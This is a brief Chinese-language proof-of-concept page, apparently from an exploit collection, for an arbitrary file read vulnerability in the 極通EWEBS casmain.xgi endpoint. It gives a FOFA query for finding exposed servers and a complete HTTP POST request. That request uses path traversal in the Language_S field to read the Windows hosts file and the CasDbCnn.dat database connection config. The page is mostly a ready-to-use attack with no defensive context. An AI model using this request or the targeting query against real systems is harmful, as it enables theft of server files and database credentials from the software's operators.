極通EWEBS_casmain.xgi_任意文件讀取漏洞_zh-hant

# 極通EWEBS casmain.xgi 任意文件讀取漏洞/zh-hant

==漏洞影響==

極通EWEBS

==FOFA==

app="新软科技-极通EWEBS"

==POC==

漏洞請求包爲:

POST /casmain.xgi HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=923b86fa90ce1e14c82d4e36d1adc528; CookieLanguageName=ZH-CN
Content-Length: 57

Language_S=../../../../windows/system32/drivers/etc/hosts

可以配合 testweb.php 信息泄漏讀取敏感信息

Language_S=../../Data/CONFIG/CasDbCnn.dat
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容